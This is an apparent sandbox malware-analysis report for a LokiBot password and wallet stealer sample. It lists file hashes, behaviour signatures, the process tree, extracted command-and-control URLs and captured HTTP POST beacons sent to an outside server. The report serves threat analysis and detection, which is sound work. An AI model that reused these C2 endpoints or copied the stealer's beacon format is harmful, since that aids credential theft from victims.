Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

09fe7735f7...8a.exe

windows11-21h2-x64

10

0a08857b3b...19.vbs

windows11-21h2-x64

10

0a92b6b6c9...d0.exe

windows11-21h2-x64

10

0b1f6297e8...e6.exe

windows11-21h2-x64

10

0b4ffb13a4...aa.exe

windows11-21h2-x64

10

0b9a6ed57e...55.exe

windows11-21h2-x64

7

0be395d43c...ca.exe

windows11-21h2-x64

7

0c046f07cd...89.exe

windows11-21h2-x64

10

0c1e5acd77...53.exe

windows11-21h2-x64

10

0d825ad1df...37.exe

windows11-21h2-x64

10

0db3c21dec...f9.exe

windows11-21h2-x64

10

0de875f11e...e9.exe

windows11-21h2-x64

10

0e3bb95b7b...77.exe

windows11-21h2-x64

10

0edd5342b1...6d.exe

windows11-21h2-x64

3

0f4450a6b2...b6.exe

windows11-21h2-x64

10

10758789ca...d1.exe

windows11-21h2-x64

10

11a3fde6fb...96.exe

windows11-21h2-x64

10

11bb525d06...1c.exe

windows11-21h2-x64

10

124dcea053...69.exe

windows11-21h2-x64

10

13431e2ee5...1c.elf

windows11-21h2-x64

3

15387da23f...315.js

windows11-21h2-x64

8

15938b5637...72.exe

windows11-21h2-x64

10

170dc238d7...a4.exe

windows11-21h2-x64

10

1728680969...4d.xll

windows11-21h2-x64

10

17dadc2b10...b1.elf

windows11-21h2-x64

3

190ffc93d1...d7.apk

windows11-21h2-x64

3

1a4383821d...e1.vbs

windows11-21h2-x64

8

1aa85c5026...8d.exe

windows11-21h2-x64

10

1b13d05cae...26.exe

windows11-21h2-x64

7

1b9334e09c...52.exe

windows11-21h2-x64

10

1bcbf1dce6...0c.exe

windows11-21h2-x64

7

1bd3fa491c...5b.exe

windows11-21h2-x64

10

Resubmissions

21/12/2024, 22:57 UTC

241221-2xpr2atjar 10

21/12/2024, 20:29 UTC

241221-y9xfvsyngy 10

Analysis

  • max time kernel
    46s
  • max time network
    79s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    21/12/2024, 22:57 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe

  • Size

    851KB

  • MD5

    84a4e8581550b0634e38d3218813ac79

  • SHA1

    1005f9154fb27c448ce8e39646b2da1fc010942e

  • SHA256

    1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d

  • SHA512

    0c924c0763f9bec6c7de3f303263436c8c63ff40682966feb04ffa54eb282aabe5d52a8d5dbffd417666f0a7d77d25eb24956a853616dfed24c79c278e9dd5a9

  • SSDEEP

    12288:y4xTxt9ivc50KsBNgK10IJkHKqZrDgSQlOnvgfEunph:3FivcRsBVBJyZX28n2

Score
10/10
lokibotcollectiondiscoveryspywarestealertrojan

Malware Config

Extracted

Family

lokibot

C2

http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

    trojanspywarestealerlokibot
  • Lokibot family
    lokibot
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
    "C:\Users\Admin\AppData\Local\Temp\1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5040
    • C:\Users\Admin\AppData\Local\Temp\1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
      "C:\Users\Admin\AppData\Local\Temp\1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe"
      2⤵
        PID:2824
      • C:\Users\Admin\AppData\Local\Temp\1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
        "C:\Users\Admin\AppData\Local\Temp\1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe"
        2⤵
          PID:2044
        • C:\Users\Admin\AppData\Local\Temp\1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
          "C:\Users\Admin\AppData\Local\Temp\1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe"
          2⤵
          • Accesses Microsoft Outlook profiles
          • Suspicious behavior: RenamesItself
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:6020

      Network

      • flag-us
        POST
        http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G
        1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
        Remote address:
        192.64.118.167:80
        Request
        POST /profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 192.64.118.167
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: 42C5988
        Content-Length: 180
        Connection: close
        Response
        HTTP/1.1 404 Not Found
        Date: Sat, 21 Dec 2024 23:11:17 GMT
        Server: Apache
        Accept-Ranges: bytes
        Cache-Control: no-cache, no-store, must-revalidate
        Pragma: no-cache
        Expires: 0
        Connection: close
        Content-Type: text/html
      • flag-us
        POST
        http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G
        1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
        Remote address:
        192.64.118.167:80
        Request
        POST /profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 192.64.118.167
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: 42C5988
        Content-Length: 180
        Connection: close
        Response
        HTTP/1.1 404 Not Found
        Date: Sat, 21 Dec 2024 23:11:17 GMT
        Server: Apache
        Accept-Ranges: bytes
        Cache-Control: no-cache, no-store, must-revalidate
        Pragma: no-cache
        Expires: 0
        Connection: close
        Content-Type: text/html
      • flag-us
        DNS
        167.118.64.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        167.118.64.192.in-addr.arpa
        IN PTR
        Response
        167.118.64.192.in-addr.arpa
        IN CNAME
        167.128-25.118.64.192.in-addr.arpa
        167.128-25.118.64.192.in-addr.arpa
        IN PTR
        server2jukeboxrest
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        POST
        http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G
        1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
        Remote address:
        192.64.118.167:80
        Request
        POST /profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G HTTP/1.0
        User-Agent: Mozilla/4.08 (Charon; Inferno)
        Host: 192.64.118.167
        Accept: */*
        Content-Type: application/octet-stream
        Content-Encoding: binary
        Content-Key: 42C5988
        Content-Length: 153
        Connection: close
        Response
        HTTP/1.1 404 Not Found
        Date: Sat, 21 Dec 2024 23:11:18 GMT
        Server: Apache
        Accept-Ranges: bytes
        Cache-Control: no-cache, no-store, must-revalidate
        Pragma: no-cache
        Expires: 0
        Connection: close
        Content-Type: text/html
      • 192.64.118.167:80
        http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G
        http
        1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
        1.1kB
         11.0kB
         13
        13

        HTTP Request

        POST http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G

        HTTP Response

        404
      • 192.64.118.167:80
        http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G
        http
        1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
        1.3kB
         11.0kB
         14
        13

        HTTP Request

        POST http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G

        HTTP Response

        404
      • 192.64.118.167:80
        http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G
        http
        1aa85c5026608d04abec7b7af789f3b5e28c59064733c0efdb942a543926558d.exe
        1.0kB
         11.0kB
         13
        13

        HTTP Request

        POST http://192.64.118.167/profile.php?id=oTWpxPBp8jPKmiIpZe60rg2knpeKuIXTCTi9JUyRdoCzHlZGz5G

        HTTP Response

        404
      • 8.8.8.8:53
        167.118.64.192.in-addr.arpa
        dns
        139 B
         222 B
         2
        2

        DNS Request

        167.118.64.192.in-addr.arpa

        DNS Request

        8.8.8.8.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3973800497-2716210218-310192997-1000\0f5007522459c86e95ffcc62f32308f1_43ef074c-17c1-4956-ab3f-c3b0c6ae62b9
        Filesize

        46B

        MD5

        d898504a722bff1524134c6ab6a5eaa5

        SHA1

        e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

        SHA256

        878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

        SHA512

        26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

        Download Submit

      • memory/5040-10-0x000000000AAB0000-0x000000000AB2A000-memory.dmp

        Filesize

        488KB

        Download

      • memory/5040-11-0x000000000ABD0000-0x000000000AC6C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/5040-3-0x0000000005470000-0x0000000005502000-memory.dmp

        Filesize

        584KB

        Download

      • memory/5040-0-0x00000000749EE000-0x00000000749EF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/5040-5-0x00000000749E0000-0x0000000075191000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/5040-6-0x00000000083E0000-0x00000000083F8000-memory.dmp

        Filesize

        96KB

        Download

      • memory/5040-7-0x00000000749EE000-0x00000000749EF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/5040-8-0x00000000749E0000-0x0000000075191000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/5040-2-0x0000000005A20000-0x0000000005FC6000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/5040-9-0x0000000008400000-0x000000000840C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/5040-4-0x0000000005450000-0x000000000545A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/5040-12-0x000000000ACE0000-0x000000000AD46000-memory.dmp

        Filesize

        408KB

        Download

      • memory/5040-13-0x000000000AB30000-0x000000000AB52000-memory.dmp

        Filesize

        136KB

        Download

      • memory/5040-1-0x00000000008E0000-0x00000000009BC000-memory.dmp

        Filesize

        880KB

        Download

      • memory/5040-19-0x00000000749E0000-0x0000000075191000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/6020-18-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB

        Download

      • memory/6020-16-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB

        Download

      • memory/6020-14-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB

        Download

      • memory/6020-37-0x0000000000400000-0x00000000004A2000-memory.dmp

        Filesize

        648KB

        Download

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.